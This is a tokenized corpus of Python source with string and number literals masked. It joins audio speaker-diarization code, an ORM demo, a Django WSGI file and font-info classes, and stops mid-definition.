<EOL> timeX = numpy . arange ( <NUM_LIT:0> , x . shape [ <NUM_LIT:0> ] / float ( Fs ) , <NUM_LIT:1.0> / Fs ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> plt . plot ( timeX , x ) <EOL> for s in segmentLimits : <EOL> plt . axvline ( x = s [ <NUM_LIT:0> ] ) <EOL> plt . axvline ( x = s [ <NUM_LIT:1> ] ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> plt . plot ( numpy . arange ( <NUM_LIT:0> , ProbOnset . shape [ <NUM_LIT:0> ] * stStep , stStep ) , ProbOnset ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> for s in segmentLimits : <EOL> plt . axvline ( x = s [ <NUM_LIT:0> ] ) <EOL> plt . axvline ( x = s [ <NUM_LIT:1> ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . show ( ) <EOL> return segmentLimits <EOL> def speakerDiarization ( fileName , numOfSpeakers , mtSize = <NUM_LIT> , mtStep = <NUM_LIT> , stWin = <NUM_LIT> , LDAdim = <NUM_LIT> , PLOT = False ) : <EOL> '''<STR_LIT>''' <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( fileName ) <EOL> x = audioBasicIO . stereo2mono ( x ) <EOL> Duration = len ( x ) / Fs <EOL> [ Classifier1 , MEAN1 , STD1 , classNames1 , mtWin1 , mtStep1 , stWin1 , stStep1 , computeBEAT1 ] = aT . loadKNNModel ( "<STR_LIT>" ) <EOL> [ Classifier2 , MEAN2 , STD2 , classNames2 , mtWin2 , mtStep2 , stWin2 , stStep2 , computeBEAT2 ] = aT . loadKNNModel ( "<STR_LIT>" ) <EOL> [ MidTermFeatures , ShortTermFeatures ] = aF . mtFeatureExtraction ( x , Fs , mtSize * Fs , mtStep * Fs , round ( Fs * stWin ) , round ( Fs * stWin * <NUM_LIT:0.5> ) ) <EOL> MidTermFeatures2 = numpy . zeros ( ( MidTermFeatures . shape [ <NUM_LIT:0> ] + len ( classNames1 ) + len ( classNames2 ) , MidTermFeatures . shape [ <NUM_LIT:1> ] ) ) <EOL> for i in range ( MidTermFeatures . shape [ <NUM_LIT:1> ] ) : <EOL> curF1 = ( MidTermFeatures [ : , i ] - MEAN1 ) / STD1 <EOL> curF2 = ( MidTermFeatures [ : , i ] - MEAN2 ) / STD2 <EOL> [ Result , P1 ] = aT . classifierWrapper ( Classifier1 , "<STR_LIT>" , curF1 ) <EOL> [ Result , P2 ] = aT . classifierWrapper ( Classifier2 , "<STR_LIT>" , curF2 ) <EOL> MidTermFeatures2 [ <NUM_LIT:0> : MidTermFeatures . shape [ <NUM_LIT:0> ] , i ] = MidTermFeatures [ : , i ] <EOL> MidTermFeatures2 [ MidTermFeatures . shape [ <NUM_LIT:0> ] : MidTermFeatures . shape [ <NUM_LIT:0> ] + len ( classNames1 ) , i ] = P1 + <NUM_LIT> <EOL> MidTermFeatures2 [ MidTermFeatures . shape [ <NUM_LIT:0> ] + len ( classNames1 ) : : , i ] = P2 + <NUM_LIT> <EOL> MidTermFeatures = MidTermFeatures2 <EOL> iFeaturesSelect = [ <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> MidTermFeatures = MidTermFeatures [ iFeaturesSelect , : ] <EOL> ( MidTermFeaturesNorm , MEAN , STD ) = aT . normalizeFeatures ( [ MidTermFeatures . T ] ) <EOL> MidTermFeaturesNorm = MidTermFeaturesNorm [ <NUM_LIT:0> ] . T <EOL> numOfWindows = MidTermFeatures . shape [ <NUM_LIT:1> ] <EOL> DistancesAll = numpy . sum ( distance . squareform ( distance . pdist ( MidTermFeaturesNorm . T ) ) , axis = <NUM_LIT:0> ) <EOL> MDistancesAll = numpy . mean ( DistancesAll ) <EOL> iNonOutLiers = numpy . nonzero ( DistancesAll < <NUM_LIT> * MDistancesAll ) [ <NUM_LIT:0> ] <EOL> perOutLier = ( <NUM_LIT> * ( numOfWindows - iNonOutLiers . shape [ <NUM_LIT:0> ] ) ) / numOfWindows <EOL> MidTermFeaturesNormOr = MidTermFeaturesNorm <EOL> MidTermFeaturesNorm = MidTermFeaturesNorm [ : , iNonOutLiers ] <EOL> if LDAdim > <NUM_LIT:0> : <EOL> mtWinRatio = int ( round ( mtSize / stWin ) ) <EOL> mtStepRatio = int ( round ( stWin / stWin ) ) <EOL> mtFeaturesToReduce = [ ] <EOL> numOfFeatures = len ( ShortTermFeatures ) <EOL> numOfStatistics = <NUM_LIT:2> <EOL> for i in range ( numOfStatistics * numOfFeatures ) : <EOL> mtFeaturesToReduce . append ( [ ] ) <EOL> for i in range ( numOfFeatures ) : <EOL> curPos = <NUM_LIT:0> <EOL> N = len ( ShortTermFeatures [ i ] ) <EOL> while ( curPos < N ) : <EOL> N1 = curPos <EOL> N2 = curPos + mtWinRatio <EOL> if N2 > N : <EOL> N2 = N <EOL> curStFeatures = ShortTermFeatures [ i ] [ N1 : N2 ] <EOL> mtFeaturesToReduce [ i ] . append ( numpy . mean ( curStFeatures ) ) <EOL> mtFeaturesToReduce [ i + numOfFeatures ] . append ( numpy . std ( curStFeatures ) ) <EOL> curPos += mtStepRatio <EOL> mtFeaturesToReduce = numpy . array ( mtFeaturesToReduce ) <EOL> mtFeaturesToReduce2 = numpy . zeros ( ( mtFeaturesToReduce . shape [ <NUM_LIT:0> ] + len ( classNames1 ) + len ( classNames2 ) , mtFeaturesToReduce . shape [ <NUM_LIT:1> ] ) ) <EOL> for i in range ( mtFeaturesToReduce . shape [ <NUM_LIT:1> ] ) : <EOL> curF1 = ( mtFeaturesToReduce [ : , i ] - MEAN1 ) / STD1 <EOL> curF2 = ( mtFeaturesToReduce [ : , i ] - MEAN2 ) / STD2 <EOL> [ Result , P1 ] = aT . classifierWrapper ( Classifier1 , "<STR_LIT>" , curF1 ) <EOL> [ Result , P2 ] = aT . classifierWrapper ( Classifier2 , "<STR_LIT>" , curF2 ) <EOL> mtFeaturesToReduce2 [ <NUM_LIT:0> : mtFeaturesToReduce . shape [ <NUM_LIT:0> ] , i ] = mtFeaturesToReduce [ : , i ] <EOL> mtFeaturesToReduce2 [ mtFeaturesToReduce . shape [ <NUM_LIT:0> ] : mtFeaturesToReduce . shape [ <NUM_LIT:0> ] + len ( classNames1 ) , i ] = P1 + <NUM_LIT> <EOL> mtFeaturesToReduce2 [ mtFeaturesToReduce . shape [ <NUM_LIT:0> ] + len ( classNames1 ) : : , i ] = P2 + <NUM_LIT> <EOL> mtFeaturesToReduce = mtFeaturesToReduce2 <EOL> mtFeaturesToReduce = mtFeaturesToReduce [ iFeaturesSelect , : ] <EOL> ( mtFeaturesToReduce , MEAN , STD ) = aT . normalizeFeatures ( [ mtFeaturesToReduce . T ] ) <EOL> mtFeaturesToReduce = mtFeaturesToReduce [ <NUM_LIT:0> ] . T <EOL> Labels = numpy . zeros ( ( mtFeaturesToReduce . shape [ <NUM_LIT:1> ] , ) ) ; <EOL> LDAstep = <NUM_LIT:1.0> <EOL> LDAstepRatio = LDAstep / stWin <EOL> for i in range ( Labels . shape [ <NUM_LIT:0> ] ) : <EOL> Labels [ i ] = int ( i * stWin / LDAstepRatio ) ; <EOL> clf = LDA ( n_components = LDAdim ) <EOL> clf . fit ( mtFeaturesToReduce . T , Labels , tol = <NUM_LIT> ) <EOL> MidTermFeaturesNorm = ( clf . transform ( MidTermFeaturesNorm . T ) ) . T <EOL> if numOfSpeakers <= <NUM_LIT:0> : <EOL> sRange = range ( <NUM_LIT:2> , <NUM_LIT:10> ) <EOL> else : <EOL> sRange = [ numOfSpeakers ] <EOL> clsAll = [ ] <EOL> silAll = [ ] <EOL> centersAll = [ ] <EOL> for iSpeakers in sRange : <EOL> cls , means , steps = mlpy . kmeans ( MidTermFeaturesNorm . T , k = iSpeakers , plus = True ) <EOL> clsAll . append ( cls ) <EOL> centersAll . append ( means ) <EOL> silA = [ ] ; silB = [ ] <EOL> for c in range ( iSpeakers ) : <EOL> clusterPerCent = numpy . nonzero ( cls == c ) [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] / float ( len ( cls ) ) <EOL> if clusterPerCent < <NUM_LIT> : <EOL> silA . append ( <NUM_LIT:0.0> ) <EOL> silB . append ( <NUM_LIT:0.0> ) <EOL> else : <EOL> MidTermFeaturesNormTemp = MidTermFeaturesNorm [ : , cls == c ] <EOL> Yt = distance . pdist ( MidTermFeaturesNormTemp . T ) <EOL> silA . append ( numpy . mean ( Yt ) * clusterPerCent ) <EOL> silBs = [ ] <EOL> for c2 in range ( iSpeakers ) : <EOL> if c2 != c : <EOL> clusterPerCent2 = numpy . nonzero ( cls == c2 ) [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] / float ( len ( cls ) ) <EOL> MidTermFeaturesNormTemp2 = MidTermFeaturesNorm [ : , cls == c2 ] <EOL> Yt = distance . cdist ( MidTermFeaturesNormTemp . T , MidTermFeaturesNormTemp2 . T ) <EOL> silBs . append ( numpy . mean ( Yt ) * ( clusterPerCent + clusterPerCent2 ) / <NUM_LIT> ) <EOL> silBs = numpy . array ( silBs ) <EOL> silB . append ( min ( silBs ) ) <EOL> silA = numpy . array ( silA ) ; <EOL> silB = numpy . array ( silB ) ; <EOL> sil = [ ] <EOL> for c in range ( iSpeakers ) : <EOL> sil . append ( ( silB [ c ] - silA [ c ] ) / ( max ( silB [ c ] , silA [ c ] ) + <NUM_LIT> ) ) <EOL> silAll . append ( numpy . mean ( sil ) ) <EOL> imax = numpy . argmax ( silAll ) <EOL> nSpeakersFinal = sRange [ imax ] <EOL> cls = numpy . zeros ( ( numOfWindows , ) ) <EOL> for i in range ( numOfWindows ) : <EOL> j = numpy . argmin ( numpy . abs ( i - iNonOutLiers ) ) <EOL> cls [ i ] = clsAll [ imax ] [ j ] <EOL> for i in range ( <NUM_LIT:1> ) : <EOL> startprob , transmat , means , cov = trainHMM_computeStatistics ( MidTermFeaturesNormOr , cls ) <EOL> hmm = sklearn . hmm . GaussianHMM ( startprob . shape [ <NUM_LIT:0> ] , "<STR_LIT>" , startprob , transmat ) <EOL> hmm . means_ = means ; hmm . covars_ = cov <EOL> cls = hmm . predict ( MidTermFeaturesNormOr . T ) <EOL> cls = scipy . signal . medfilt ( cls , <NUM_LIT> ) <EOL> cls = scipy . signal . medfilt ( cls , <NUM_LIT:11> ) <EOL> sil = silAll [ imax ] <EOL> classNames = [ "<STR_LIT>" . format ( c ) for c in range ( nSpeakersFinal ) ] ; <EOL> gtFile = fileName . replace ( '<STR_LIT>' , '<STR_LIT>' ) ; <EOL> if os . path . isfile ( gtFile ) : <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> flagsGT , classNamesGT = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> if PLOT : <EOL> fig = plt . figure ( ) <EOL> if numOfSpeakers > <NUM_LIT:0> : <EOL> ax1 = fig . add_subplot ( <NUM_LIT> ) <EOL> else : <EOL> ax1 = fig . add_subplot ( <NUM_LIT> ) <EOL> ax1 . set_yticks ( numpy . array ( range ( len ( classNames ) ) ) ) <EOL> ax1 . axis ( ( <NUM_LIT:0> , Duration , - <NUM_LIT:1> , len ( classNames ) ) ) <EOL> ax1 . set_yticklabels ( classNames ) <EOL> ax1 . plot ( numpy . array ( range ( len ( cls ) ) ) * mtStep + mtStep / <NUM_LIT> , cls ) <EOL> if os . path . isfile ( gtFile ) : <EOL> if PLOT : <EOL> ax1 . plot ( numpy . array ( range ( len ( flagsGT ) ) ) * mtStep + mtStep / <NUM_LIT> , flagsGT , '<STR_LIT:r>' ) <EOL> purityClusterMean , puritySpeakerMean = evaluateSpeakerDiarization ( cls , flagsGT ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT:100> * purityClusterMean , <NUM_LIT:100> * puritySpeakerMean ) <EOL> if PLOT : <EOL> plt . title ( "<STR_LIT>" . format ( <NUM_LIT:100> * purityClusterMean , <NUM_LIT:100> * puritySpeakerMean ) ) <EOL> if PLOT : <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> if numOfSpeakers <= <NUM_LIT:0> : <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( sRange , silAll ) <EOL> plt . xlabel ( "<STR_LIT>" ) ; <EOL> plt . ylabel ( "<STR_LIT>" ) ; <EOL> plt . show ( ) <EOL> def speakerDiarizationEvaluateScript ( folderName , LDAs ) : <EOL> '''<STR_LIT>''' <EOL> types = ( '<STR_LIT>' , ) <EOL> wavFilesList = [ ] <EOL> for files in types : <EOL> wavFilesList . extend ( glob . glob ( os . path . join ( folderName , files ) ) ) <EOL> wavFilesList = sorted ( wavFilesList ) <EOL> N = [ ] <EOL> for wavFile in wavFilesList : <EOL> gtFile = wavFile . replace ( '<STR_LIT>' , '<STR_LIT>' ) ; <EOL> if os . path . isfile ( gtFile ) : <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> N . append ( len ( list ( set ( segLabels ) ) ) ) <EOL> else : <EOL> N . append ( - <NUM_LIT:1> ) <EOL> for l in LDAs : <EOL> print "<STR_LIT>" . format ( l ) <EOL> for i , wavFile in enumerate ( wavFilesList ) : <EOL> speakerDiarization ( wavFile , N [ i ] , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , l , PLOT = False ) <EOL> print <EOL> def musicThumbnailing ( x , Fs , shortTermSize = <NUM_LIT:1.0> , shortTermStep = <NUM_LIT:0.5> , thumbnailSize = <NUM_LIT> , Limit1 = <NUM_LIT:0> , Limit2 = <NUM_LIT:1> ) : <EOL> '''<STR_LIT>''' <EOL> x = audioBasicIO . stereo2mono ( x ) ; <EOL> stFeatures = aF . stFeatureExtraction ( x , Fs , Fs * shortTermSize , Fs * shortTermStep ) <EOL> S = selfSimilarityMatrix ( stFeatures ) <EOL> M = int ( round ( thumbnailSize / shortTermStep ) ) <EOL> B = numpy . eye ( M , M ) <EOL> S = scipy . signal . convolve2d ( S , B , '<STR_LIT>' ) <EOL> MIN = numpy . min ( S ) <EOL> for i in range ( S . shape [ <NUM_LIT:0> ] ) : <EOL> for j in range ( S . shape [ <NUM_LIT:1> ] ) : <EOL> if abs ( i - j ) < <NUM_LIT> / shortTermStep or i > j : <EOL> S [ i , j ] = MIN ; <EOL> S [ <NUM_LIT:0> : int ( Limit1 * S . shape [ <NUM_LIT:0> ] ) , : ] = MIN <EOL> S [ : , <NUM_LIT:0> : int ( Limit1 * S . shape [ <NUM_LIT:0> ] ) ] = MIN <EOL> S [ int ( Limit2 * S . shape [ <NUM_LIT:0> ] ) : : , : ] = MIN <EOL> S [ : , int ( Limit2 * S . shape [ <NUM_LIT:0> ] ) : : ] = MIN <EOL> maxVal = numpy . max ( S ) <EOL> [ I , J ] = numpy . unravel_index ( S . argmax ( ) , S . shape ) <EOL> i1 = I ; i2 = I <EOL> j1 = J ; j2 = J <EOL> while i2 - i1 < M : <EOL> if i1 <= <NUM_LIT:0> or j1 <= <NUM_LIT:0> or i2 >= S . shape [ <NUM_LIT:0> ] - <NUM_LIT:2> or j2 >= S . shape [ <NUM_LIT:1> ] - <NUM_LIT:2> : <EOL> break <EOL> if S [ i1 - <NUM_LIT:1> , j1 - <NUM_LIT:1> ] > S [ i2 + <NUM_LIT:1> , j2 + <NUM_LIT:1> ] : <EOL> i1 -= <NUM_LIT:1> <EOL> j1 -= <NUM_LIT:1> <EOL> else : <EOL> i2 += <NUM_LIT:1> <EOL> j2 += <NUM_LIT:1> <EOL> return ( shortTermStep * i1 , shortTermStep * i2 , shortTermStep * j1 , shortTermStep * j2 , S ) </s>
<s> from quick_orm . core import Database <EOL> from sqlalchemy import Column , String , Text <EOL> __metaclass__ = Database . DefaultMeta <EOL> class User : <EOL> name = Column ( String ( <NUM_LIT> ) ) <EOL> @ Database . many_to_one ( User ) <EOL> class Post : <EOL> content = Column ( Text ) <EOL> class Question ( Post ) : <EOL> title = Column ( String ( <NUM_LIT> ) ) <EOL> @ Database . many_to_one ( Question ) <EOL> class Answer ( Post ) : <EOL> pass <EOL> @ Database . many_to_one ( Post ) <EOL> class Comment ( Post ) : <EOL> pass <EOL> @ Database . many_to_many ( Post ) <EOL> class Tag : <EOL> name = Column ( String ( <NUM_LIT> ) ) <EOL> Database . register ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> db = Database ( '<STR_LIT>' ) <EOL> db . create_tables ( ) <EOL> user1 = User ( name = '<STR_LIT>' ) <EOL> user2 = User ( name = '<STR_LIT>' ) <EOL> tag1 = Tag ( name = '<STR_LIT>' ) <EOL> tag2 = Tag ( name = '<STR_LIT>' ) <EOL> question = Question ( user = user1 , title = '<STR_LIT>' , content = '<STR_LIT>' , tags = [ tag1 , ] ) <EOL> question2 = Question ( user = user1 , title = '<STR_LIT>' , content = '<STR_LIT>' , tags = [ tag1 , ] ) <EOL> answer = Answer ( user = user1 , question = question , tags = [ tag1 , ] , <EOL> content = '<STR_LIT>' ) <EOL> comment1 = Comment ( user = user2 , content = '<STR_LIT>' , post = question ) <EOL> comment2 = Comment ( user = user2 , content = '<STR_LIT>' , post = answer , tags = [ tag2 , ] ) <EOL> db . session . add_all_then_commit ( [ question , question2 , answer , comment1 , comment2 , tag1 , tag2 , ] ) <EOL> question = db . session . query ( Question ) . get ( <NUM_LIT:1> ) <EOL> print '<STR_LIT>' . format ( question . title , '<STR_LIT:U+002CU+0020>' . join ( tag . name for tag in question . tags ) ) <EOL> print '<STR_LIT>' , question . comments . first ( ) . content <EOL> print '<STR_LIT>' , question . answers . first ( ) . comments . first ( ) . content <EOL> user = db . session . query ( User ) . filter_by ( name = '<STR_LIT>' ) . one ( ) <EOL> print '<STR_LIT>' . format ( user . comments . count ( ) ) <EOL> tag = db . session . query ( Tag ) . filter_by ( name = '<STR_LIT>' ) . first ( ) <EOL> print '<STR_LIT>' . format ( tag . questions . count ( ) ) </s>
<s> from os . path import abspath , dirname , join <EOL> import os <EOL> import sys <EOL> sys . stdout = sys . stderr <EOL> sys . path . insert ( <NUM_LIT:0> , abspath ( join ( dirname ( __file__ ) , "<STR_LIT:..>" , "<STR_LIT:..>" ) ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , abspath ( join ( dirname ( __file__ ) , "<STR_LIT:..>" ) ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , abspath ( join ( dirname ( __file__ ) , "<STR_LIT:..>" , "<STR_LIT>" ) ) ) <EOL> os . environ [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> from django . core . handlers . wsgi import WSGIHandler <EOL> application = WSGIHandler ( ) </s>
<s> """<STR_LIT>""" <EOL> def extractCMAP ( ttFont ) : <EOL> return ttFont [ "<STR_LIT>" ] . getcmap ( <NUM_LIT:3> , <NUM_LIT:1> ) . cmap <EOL> def reverseCMAP ( cmap ) : <EOL> reversed = { } <EOL> for value , name in cmap . items ( ) : <EOL> if name not in reversed : <EOL> reversed [ name ] = [ ] <EOL> reversed [ name ] . append ( value ) <EOL> return reversed </s>
<s> from warnings import warn <EOL> from robofab import ufoLib <EOL> from defcon . objects . base import BaseObject <EOL> class Info ( BaseObject ) : <EOL> """<STR_LIT>""" <EOL> changeNotificationName = "<STR_LIT>" <EOL> beginUndoNotificationName = "<STR_LIT>" <EOL> endUndoNotificationName = "<STR_LIT>" <EOL> beginRedoNotificationName = "<STR_LIT>" <EOL> endRedoNotificationName = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> super ( Info , self ) . __init__ ( ) <EOL> self . _ascender = None <EOL> self . _capHeight = None <EOL> self . _copyright = None <EOL> self . _descender = None <EOL> self . _familyName = None <EOL> self . _italicAngle = None <EOL> self . _macintoshFONDFamilyID = None <EOL> self . _macintoshFONDName = None <EOL> self . _note = None <EOL> self . _openTypeHeadCreated = None <EOL> self . _openTypeHeadFlags = None <EOL> self . _openTypeHeadLowestRecPPEM = None <EOL> self . _openTypeHheaAscender = None <EOL> self . _openTypeHheaCaretOffset = None <EOL> self . _openTypeHheaCaretSlopeRise = None <EOL> self . _openTypeHheaCaretSlopeRun = None <EOL> self . _openTypeHheaDescender = None <EOL> self . _openTypeHheaLineGap = None <EOL> self . _openTypeNameCompatibleFullName = None <EOL> self . _openTypeNameDescription = None <EOL> self . _openTypeNameDesigner = None <EOL> self . _openTypeNameDesignerURL = None <EOL> self . _openTypeNameLicense = None <EOL> self . _openTypeNameLicenseURL = None <EOL> self . _openTypeNameManufacturer = None <EOL> self . _openTypeNameManufacturerURL = None <EOL> self . _openTypeNamePreferredFamilyName = None <EOL> self . _openTypeNamePreferredSubfamilyName = None <EOL> self . _openTypeNameSampleText = None <EOL> self . _openTypeNameUniqueID = None <EOL> self . _openTypeNameVersion = None <EOL> self . _openTypeNameWWSFamilyName = None <EOL> self . _openTypeNameWWSSubfamilyName = None <EOL> self . _openTypeOS2CodePageRanges = None <EOL> self . _openTypeOS2FamilyClass = None <EOL> self . _openTypeOS2Panose = None <EOL> self . _openTypeOS2Selection = None <EOL> self . _openTypeOS2StrikeoutPosition = None <EOL> self . _openTypeOS2StrikeoutSize = None <EOL> self . _openTypeOS2SubscriptXOffset = None <EOL> self . _openTypeOS2SubscriptXSize = None <EOL> self . _openTypeOS2SubscriptYOffset = None <EOL> self . _openTypeOS2SubscriptYSize = None <EOL> self . _openTypeOS2SuperscriptXOffset = None <EOL> self . _openTypeOS2SuperscriptXSize = None <EOL> self . _openTypeOS2SuperscriptYOffset = None <EOL> self . _openTypeOS2SuperscriptYSize = None <EOL> self . _openTypeOS2Type = None <EOL> self . _openTypeOS2TypoAscender = None <EOL> self . _openTypeOS2TypoDescender = None <EOL> self . _openTypeOS2TypoLineGap = None <EOL> self . _openTypeOS2UnicodeRanges = None <EOL> self . _openTypeOS2VendorID = None <EOL> self . _openTypeOS2WeightClass = None <EOL> self . _openTypeOS2WidthClass = None <EOL> self . _openTypeOS2WinAscent = None <EOL> self . _openTypeOS2WinDescent = None <EOL> self . _openTypeVheaCaretOffset = None <EOL> self . _openTypeVheaCaretSlopeRise = None <EOL> self . _openTypeVheaCaretSlopeRun = None <EOL> self . _openTypeVheaVertTypoAscender = None <EOL> self . _openTypeVheaVertTypoDescender = None <EOL> self . _openTypeVheaVertTypoLineGap = None <EOL> self . _postscriptBlueFuzz = None <EOL> self . _postscriptBlueScale = None <EOL> self . _postscriptBlueShift = None <EOL> self . _postscriptBlueValues = None <EOL> self . _postscriptDefaultCharacter = None <EOL> self . _postscriptDefaultWidthX = None <EOL> self . _postscriptFamilyBlues = None <EOL> self . _postscriptFamilyOtherBlues = None <EOL> self . _postscriptFontName = None <EOL> self . _postscriptForceBold = None <EOL> self . _postscriptFullName = None <EOL> self . _postscriptIsFixedPitch = None <EOL> self . _postscriptNominalWidthX = None <EOL> self . _postscriptOtherBlues = None <EOL> self . _postscriptSlantAngle = None <EOL> self . _postscriptStemSnapH = None <EOL> self . _postscriptStemSnapV = None <EOL> self . _postscriptUnderlinePosition = None <EOL> self . _postscriptUnderlineThickness = None <EOL> self . _postscriptUniqueID = None <EOL> self . _postscriptWeightName = None <EOL> self . _postscriptWindowsCharacterSet = None <EOL> self . _styleMapFamilyName = None <EOL> self . _styleMapStyleName = None <EOL> self . _styleName = None <EOL> self . _trademark = None <EOL> self . _unitsPerEm = None <EOL> self . _versionMajor = None <EOL> self . _versionMinor = None <EOL> self . _xHeight = None <EOL> self . _year = None <EOL> def _get_ascender ( self ) : <EOL> return self . _ascender <EOL> def _set_ascender ( self , value ) : <EOL> if value is None : <EOL> self . _ascender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _ascender = value <EOL> self . dirty = True <EOL> ascender = property ( _get_ascender , _set_ascender , doc = "<STR_LIT>" ) <EOL> def _get_capHeight ( self ) : <EOL> return self . _capHeight <EOL> def _set_capHeight ( self , value ) : <EOL> if value is None : <EOL> self . _capHeight = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _capHeight = value <EOL> self . dirty = True <EOL> capHeight = property ( _get_capHeight , _set_capHeight , doc = "<STR_LIT>" ) <EOL> def _get_copyright ( self ) : <EOL> return self . _copyright <EOL> def _set_copyright ( self , value ) : <EOL> if value is None : <EOL> self . _copyright = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _copyright = value <EOL> self . dirty = True <EOL> copyright = property ( _get_copyright , _set_copyright , doc = "<STR_LIT>" ) <EOL> def _get_descender ( self ) : <EOL> return self . _descender <EOL> def _set_descender ( self , value ) : <EOL> if value is None : <EOL> self . _descender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _descender = value <EOL> self . dirty = True <EOL> descender = property ( _get_descender , _set_descender , doc = "<STR_LIT>" ) <EOL> def _get_familyName ( self ) : <EOL> return self . _familyName <EOL> def _set_familyName ( self , value ) : <EOL> if value is None : <EOL> self . _familyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _familyName = value <EOL> self . dirty = True <EOL> familyName = property ( _get_familyName , _set_familyName , doc = "<STR_LIT>" ) <EOL> def _get_italicAngle ( self ) : <EOL> return self . _italicAngle <EOL> def _set_italicAngle ( self , value ) : <EOL> if value is None : <EOL> self . _italicAngle = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _italicAngle = value <EOL> self . dirty = True <EOL> italicAngle = property ( _get_italicAngle , _set_italicAngle , doc = "<STR_LIT>" ) <EOL> def _get_macintoshFONDFamilyID ( self ) : <EOL> return self . _macintoshFONDFamilyID <EOL> def _set_macintoshFONDFamilyID ( self , value ) : <EOL> if value is None : <EOL> self . _macintoshFONDFamilyID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _macintoshFONDFamilyID = value <EOL> self . dirty = True <EOL> macintoshFONDFamilyID = property ( _get_macintoshFONDFamilyID , _set_macintoshFONDFamilyID , doc = "<STR_LIT>" ) <EOL> def _get_macintoshFONDName ( self ) : <EOL> return self . _macintoshFONDName <EOL> def _set_macintoshFONDName ( self , value ) : <EOL> if value is None : <EOL> self . _macintoshFONDName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _macintoshFONDName = value <EOL> self . dirty = True <EOL> macintoshFONDName = property ( _get_macintoshFONDName , _set_macintoshFONDName , doc = "<STR_LIT>" ) <EOL> def _get_note ( self ) : <EOL> return self . _note <EOL> def _set_note ( self , value ) : <EOL> if value is None : <EOL> self . _note = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _note = value <EOL> self . dirty = True <EOL> note = property ( _get_note , _set_note , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHeadCreated ( self ) : <EOL> return self . _openTypeHeadCreated <EOL> def _set_openTypeHeadCreated ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHeadCreated = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHeadCreated = value <EOL> self . dirty = True <EOL> openTypeHeadCreated = property ( _get_openTypeHeadCreated , _set_openTypeHeadCreated , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHeadFlags ( self ) : <EOL> return self . _openTypeHeadFlags <EOL> def _set_openTypeHeadFlags ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHeadFlags = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHeadFlags = value <EOL> self . dirty = True <EOL> openTypeHeadFlags = property ( _get_openTypeHeadFlags , _set_openTypeHeadFlags , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHeadLowestRecPPEM ( self 